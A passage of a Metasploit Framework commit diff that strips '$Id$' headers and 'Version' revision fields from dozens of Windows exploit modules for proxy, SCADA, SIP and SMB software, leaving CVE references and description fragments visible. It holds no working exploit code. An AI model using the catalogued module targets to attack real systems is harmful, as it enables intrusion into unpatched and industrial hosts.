"#{rhost}:#{rport} Connection Error: #{$!}" + rescue Rex::ConnectionError, Rex::Post::Meterpreter::RequestError return :noconn end end + end diff --git a/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb b/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb index a399992e0c..6d5e70e3ed 100644 --- a/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb +++ b/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-4085'], diff --git a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb index 7977fa9a92..99ac9dc924 100644 --- a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb +++ b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'patrick' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-2416' ], diff --git a/modules/exploits/windows/proxy/proxypro_http_get.rb b/modules/exploits/windows/proxy/proxypro_http_get.rb index e9a0331884..e27e69526b 100644 --- a/modules/exploits/windows/proxy/proxypro_http_get.rb +++ b/modules/exploits/windows/proxy/proxypro_http_get.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2004-0326'], diff --git a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb index a1e99a62dd..70f75e3eb2 100644 --- a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb +++ b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'patrick', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-2926' ], diff --git a/modules/exploits/windows/scada/citect_scada_odbc.rb b/modules/exploits/windows/scada/citect_scada_odbc.rb index a1324f3637..296010e3b3 100644 --- a/modules/exploits/windows/scada/citect_scada_odbc.rb +++ b/modules/exploits/windows/scada/citect_scada_odbc.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote 'KF ', # Original Metasploit module 'patrick', # Some clean up - I'm sure there's more to be done :) ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-2639' ], diff --git a/modules/exploits/windows/scada/daq_factory_bof.rb b/modules/exploits/windows/scada/daq_factory_bof.rb index 70e6d57577..d6d21a74ef 100644 --- a/modules/exploits/windows/scada/daq_factory_bof.rb +++ b/modules/exploits/windows/scada/daq_factory_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,8 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Luigi Auriemma', # Initial discovery, crash poc 'mr_me ', # msf exploit ], - - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-3492'], diff --git a/modules/exploits/windows/scada/factorylink_csservice.rb b/modules/exploits/windows/scada/factorylink_csservice.rb index 5ff6e32fb8..7bf741a934 100644 --- a/modules/exploits/windows/scada/factorylink_csservice.rb +++ b/modules/exploits/windows/scada/factorylink_csservice.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote therefore causing a stack-based buffer overflow, and results arbitrary code execution. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'Luigi Auriemma ', #Initial discovery, poc diff --git a/modules/exploits/windows/scada/factorylink_vrn_09.rb b/modules/exploits/windows/scada/factorylink_vrn_09.rb index b2602936a7..f7624e0b6a 100644 --- a/modules/exploits/windows/scada/factorylink_vrn_09.rb +++ b/modules/exploits/windows/scada/factorylink_vrn_09.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -34,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote 'MC', # SEH, badchars, etc ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '72815'], diff --git a/modules/exploits/windows/scada/iconics_genbroker.rb b/modules/exploits/windows/scada/iconics_genbroker.rb index 2baa05aea6..b97f100a76 100644 --- a/modules/exploits/windows/scada/iconics_genbroker.rb +++ b/modules/exploits/windows/scada/iconics_genbroker.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote process, and then open up a shell session. Also, DEP bypass is supported. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'Luigi Auriemma', #Initial discovery, poc diff --git a/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb b/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb index d7617ebfda..e2996a3de7 100644 --- a/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb +++ b/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote of the user. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'Scoot Bell ', diff --git a/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb b/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb index 847ad290a8..a47d7d4f1a 100644 --- a/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb +++ b/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote exits, IGSSdataServer.exe should automatically recover. }, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Author' => [ 'Luigi Auriemma', #Initial discovery, poc diff --git a/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb b/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb index 0e4d93f4a8..8bb201b543 100644 --- a/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb +++ b/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -34,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote the small buffer size, which cannot even contain our ROP chain and the final payload. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'Luigi Auriemma ', #Initial discovery, poc diff --git a/modules/exploits/windows/scada/igss9_misc.rb b/modules/exploits/windows/scada/igss9_misc.rb index ebbbc4fa69..c8644cbdf4 100644 --- a/modules/exploits/windows/scada/igss9_misc.rb +++ b/modules/exploits/windows/scada/igss9_misc.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote that payload with a CreateProcessA() function as a new thread. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'Luigi Auriemma', #Initial discovery, poc diff --git a/modules/exploits/windows/scada/moxa_mdmtool.rb b/modules/exploits/windows/scada/moxa_mdmtool.rb index 9c0f54a7b8..fcac4c33f6 100644 --- a/modules/exploits/windows/scada/moxa_mdmtool.rb +++ b/modules/exploits/windows/scada/moxa_mdmtool.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Ruben Santamarta', 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-4741'], diff --git a/modules/exploits/windows/scada/procyon_core_server.rb b/modules/exploits/windows/scada/procyon_core_server.rb index df6b4ef591..edc6f9e86a 100644 --- a/modules/exploits/windows/scada/procyon_core_server.rb +++ b/modules/exploits/windows/scada/procyon_core_server.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote payload exits, Coreservice.exe should automatically recover. }, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Author' => [ 'Knud Hojgaard ', # Initial discovery diff --git a/modules/exploits/windows/scada/realwin.rb b/modules/exploits/windows/scada/realwin.rb index 962bc9adfd..5786756cdc 100644 --- a/modules/exploits/windows/scada/realwin.rb +++ b/modules/exploits/windows/scada/realwin.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-4322' ], diff --git a/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb b/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb index da6a37553c..57dd677404 100644 --- a/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb +++ b/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Luigi Auriemma', 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-1563'], diff --git a/modules/exploits/windows/scada/realwin_on_fcs_login.rb b/modules/exploits/windows/scada/realwin_on_fcs_login.rb index 7408b473f3..f56139efe0 100644 --- a/modules/exploits/windows/scada/realwin_on_fcs_login.rb +++ b/modules/exploits/windows/scada/realwin_on_fcs_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -34,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote 'B|H ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-1563'], diff --git a/modules/exploits/windows/scada/realwin_scpc_initialize.rb b/modules/exploits/windows/scada/realwin_scpc_initialize.rb index 12edbea38f..8ed3420515 100644 --- a/modules/exploits/windows/scada/realwin_scpc_initialize.rb +++ b/modules/exploits/windows/scada/realwin_scpc_initialize.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Luigi Auriemma', 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '68812' ], diff --git a/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb b/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb index 50b6bf3540..bd3b4082ef 100644 --- a/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb +++ b/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Luigi Auriemma', 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '68812' ], diff --git a/modules/exploits/windows/scada/realwin_scpc_txtevent.rb b/modules/exploits/windows/scada/realwin_scpc_txtevent.rb index c3a328efa0..0311afefcf 100644 --- a/modules/exploits/windows/scada/realwin_scpc_txtevent.rb +++ b/modules/exploits/windows/scada/realwin_scpc_txtevent.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Luigi Auriemma', 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-4142'], diff --git a/modules/exploits/windows/scada/scadapro_cmdexe.rb b/modules/exploits/windows/scada/scadapro_cmdexe.rb index 92ea664d25..291d9e2fb2 100644 --- a/modules/exploits/windows/scada/scadapro_cmdexe.rb +++ b/modules/exploits/windows/scada/scadapro_cmdexe.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -34,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote 'mr_me ', # msf 'TecR0c ', # msf ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-3497'], diff --git a/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb b/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb index 791bf6016a..6c1af780ae 100644 --- a/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb +++ b/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb @@ -25,7 +25,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'Luigi Auriemma', # original discovery 'Rinat Ziyayev', - 'James Fitts' + 'James Fitts ' ], 'License' => MSF_LICENSE, 'References' => diff --git a/modules/exploits/windows/scada/winlog_runtime.rb b/modules/exploits/windows/scada/winlog_runtime.rb index bd0ef0aae4..592a53ff6f 100644 --- a/modules/exploits/windows/scada/winlog_runtime.rb +++ b/modules/exploits/windows/scada/winlog_runtime.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Luigi Auriemma', 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-0517' ], diff --git a/modules/exploits/windows/sip/aim_triton_cseq.rb b/modules/exploits/windows/sip/aim_triton_cseq.rb index 0a999ea10f..c403bf5023 100644 --- a/modules/exploits/windows/sip/aim_triton_cseq.rb +++ b/modules/exploits/windows/sip/aim_triton_cseq.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote the affected application. }, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-3524'], diff --git a/modules/exploits/windows/sip/sipxezphone_cseq.rb b/modules/exploits/windows/sip/sipxezphone_cseq.rb index 047efe2110..db6a6093a3 100644 --- a/modules/exploits/windows/sip/sipxezphone_cseq.rb +++ b/modules/exploits/windows/sip/sipxezphone_cseq.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote the affected application. }, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-3524'], diff --git a/modules/exploits/windows/sip/sipxphone_cseq.rb b/modules/exploits/windows/sip/sipxphone_cseq.rb index 1bf478612a..5823b21176 100644 --- a/modules/exploits/windows/sip/sipxphone_cseq.rb +++ b/modules/exploits/windows/sip/sipxphone_cseq.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote the affected application. }, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-3524' ], diff --git a/modules/exploits/windows/smb/ms03_049_netapi.rb b/modules/exploits/windows/smb/ms03_049_netapi.rb index 0e70b92b8f..d9add5404a 100644 --- a/modules/exploits/windows/smb/ms03_049_netapi.rb +++ b/modules/exploits/windows/smb/ms03_049_netapi.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0812' ], diff --git a/modules/exploits/windows/smb/ms04_007_killbill.rb b/modules/exploits/windows/smb/ms04_007_killbill.rb index 433b07133b..30ff256c27 100644 --- a/modules/exploits/windows/smb/ms04_007_killbill.rb +++ b/modules/exploits/windows/smb/ms04_007_killbill.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -43,7 +39,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Solar Eclipse ' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0818'], diff --git a/modules/exploits/windows/smb/ms04_011_lsass.rb b/modules/exploits/windows/smb/ms04_011_lsass.rb index b0c111b2c7..0fbb4d138b 100644 --- a/modules/exploits/windows/smb/ms04_011_lsass.rb +++ b/modules/exploits/windows/smb/ms04_011_lsass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0533' ], diff --git a/modules/exploits/windows/smb/ms04_031_netdde.rb b/modules/exploits/windows/smb/ms04_031_netdde.rb index 185d432122..a9220cc071 100644 --- a/modules/exploits/windows/smb/ms04_031_netdde.rb +++ b/modules/exploits/windows/smb/ms04_031_netdde.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'pusscat' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-0206'], diff --git a/modules/exploits/windows/smb/ms05_039_pnp.rb b/modules/exploits/windows/smb/ms05_039_pnp.rb index f28dba1868..2e90692c37 100644 --- a/modules/exploits/windows/smb/ms05_039_pnp.rb +++ b/modules/exploits/windows/smb/ms05_039_pnp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm', 'cazz' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-1983' ], diff --git a/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb b/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb index 4d71b39f69..ec87770a10 100644 --- a/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb +++ b/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -36,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'pusscat', 'hdm' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-2370' ], diff --git a/modules/exploits/windows/smb/ms06_025_rras.rb b/modules/exploits/windows/smb/ms06_025_rras.rb index a6672785ca..35b1001752 100644 --- a/modules/exploits/windows/smb/ms06_025_rras.rb +++ b/modules/exploits/windows/smb/ms06_025_rras.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-2370' ], diff --git a/modules/exploits/windows/smb/ms06_040_netapi.rb b/modules/exploits/windows/smb/ms06_040_netapi.rb index 5388850f64..9bc8c11b9f 100644 --- a/modules/exploits/windows/smb/ms06_040_netapi.rb +++ b/modules/exploits/windows/smb/ms06_040_netapi.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -34,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-3439' ], diff --git a/modules/exploits/windows/smb/ms06_066_nwapi.rb b/modules/exploits/windows/smb/ms06_066_nwapi.rb index 33f523dcee..48e1bf5096 100644 --- a/modules/exploits/windows/smb/ms06_066_nwapi.rb +++ b/modules/exploits/windows/smb/ms06_066_nwapi.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'pusscat' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-4688'], diff --git a/modules/exploits/windows/smb/ms06_066_nwwks.rb b/modules/exploits/windows/smb/ms06_066_nwwks.rb index 34446c6f14..77e96bc970 100644 --- a/modules/exploits/windows/smb/ms06_066_nwwks.rb +++ b/modules/exploits/windows/smb/ms06_066_nwwks.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'pusscat' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-4688'], diff --git a/modules/exploits/windows/smb/ms06_070_wkssvc.rb b/modules/exploits/windows/smb/ms06_070_wkssvc.rb index 2fbc86ecba..ab73292cf8 100644 --- a/modules/exploits/windows/smb/ms06_070_wkssvc.rb +++ b/modules/exploits/windows/smb/ms06_070_wkssvc.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -39,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-4691' ], diff --git a/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb b/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb index b1b65e915d..7e58942e6f 100644 --- a/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb +++ b/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -36,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Unknown' # 2 unknown contributors (2003 support) ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-1748'], diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb index e60da6e5a3..3723b72fc8 100644 --- a/modules/exploits/windows/smb/ms08_067_netapi.rb +++ b/modules/exploits/windows/smb/ms08_067_netapi.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -42,7 +38,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck', # XP SP2/SP3 AlwaysOn DEP bypass ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-4250'], diff --git a/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb b/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb index 6908e6f5bc..ed065abe6e 100644 --- a/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb +++ b/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'Laurent Gaffie ', 'hdm', 'sf' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'MSB', 'MS09-050' ], diff --git a/modules/exploits/windows/smb/ms10_061_spoolss.rb b/modules/exploits/windows/smb/ms10_061_spoolss.rb index 44e1d94079..42206d722a 100644 --- a/modules/exploits/windows/smb/ms10_061_spoolss.rb +++ b/modules/exploits/windows/smb/ms10_061_spoolss.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -43,7 +39,6 @@ class Metasploit3 < Msf::Exploit::Remote 'hdm' # ATSVC RPC proxy method, etc ;) ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => 'win', 'References' => [ diff --git a/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb b/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb index 4f7e02823c..04c38e8b6d 100644 --- a/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb +++ b/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC', 'Ruben Santamarta' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1350' ], diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb index edf6593d20..14b3454d45 100644 --- a/modules/exploits/windows/smb/psexec.rb +++ b/modules/exploits/windows/smb/psexec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -50,7 +46,6 @@ class Metasploit3 < Msf::Exploit::Remote 'hdm', ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Privileged' => true, 'DefaultOptions' => { diff --git a/modules/exploits/windows/smb/smb_relay.rb b/modules/exploits/windows/smb/smb_relay.rb index b0b94261d8..0bc45cb8a4 100644 --- a/modules/exploits/windows/smb/smb_relay.rb +++ b/modules/exploits/windows/smb/smb_relay.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -67,7 +63,6 @@ class Metasploit3 < Msf::Exploit::Remote 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Privileged' => true, 'DefaultOptions' => { diff --git a/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb b/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb index 1fea3f1f5f..30e4937996 100644 --- a/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb +++ b/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -40,7 +36,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'bannedit' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1394' ], diff 